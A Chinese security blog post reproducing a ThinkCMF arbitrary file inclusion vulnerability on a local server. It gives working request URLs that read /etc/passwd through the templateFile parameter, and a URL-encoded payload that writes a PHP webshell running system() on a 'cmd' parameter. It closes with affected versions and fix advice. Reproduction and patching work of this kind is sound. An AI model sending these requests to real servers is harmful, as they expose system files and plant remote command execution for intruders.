您现在的位置是:网站首页> 网络安全 神兵利器

ThinkCMF 任意文件包含漏洞复现

kn1fe2019-11-15 11:50:37神兵利器人已围观

简介ThinkCMF框架存在任意文件包含漏洞

这几天看到ThiknCMF存在任意文件包含漏洞,闲下来复现一下。

搭建环境,放到服务器上。

先来试试读取README文件


http://127.0.0.1/?a=display&templateFile=REMADE.md



emmm,好使,再来读读系统文件


http://127.0.0.1/?a=display&templateFile=/etc/passwd


真香,尝试一下文件包含webshell


http://127.0.0.1/?a=fetch&tem ... %27%27&content=<php>file_put_contents('0a30e0d61182dbb7c1eed5135787fb84.php','%3c%3f%70%68%70%0d%0a%65%63%68%6f%20%6d%64%35%28%22%54%68%69%6e%6b%43%4d%46%22%29%3b%0d%0a%20%20%20%20%69%66%28%69%73%73%65%74%28%24%5f%52%45%51%55%45%53%54%5b%22%63%6d%64%22%5d%29%29%7b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%65%63%68%6f%20%22%3c%70%72%65%3e%22%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%24%63%6d%64%20%3d%20%28%24%5f%52%45%51%55%45%53%54%5b%22%63%6d%64%22%5d%29%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%73%79%73%74%65%6d%28%24%63%6d%64%29%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%65%63%68%6f%20%22%3c%2f%70%72%65%3e%22%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%64%69%65%3b%0d%0a%20%20%20%20%7d%0d%0a%70%68%70%69%6e%66%6f%28%29%3b%0d%0a%3f%3e')</php>


完美,哈哈!

当然复现过程不会那么顺利,踩了好多坑,看了好多文档。

继续学习继续学习!!!


漏洞影响范围

ThinkCMF X1.6.0

ThinkCMF X2.1.0

ThinkCMF X2.2.0

ThinkCMF X2.2.1

ThinkCMF X2.2.2


修复建议

1.将 HomebaseController.class.php 和 AdminbaseController.class.php 类中 display 和 fetch 函数的修饰符改为 protected

2.更新框架版本,升级为最新版本框架

很赞哦!()

上一篇:泛微oa 远程代码执行批量脚本

下一篇: 这已经是最后一篇了!
kn1fe

kn1fe(共5篇文章)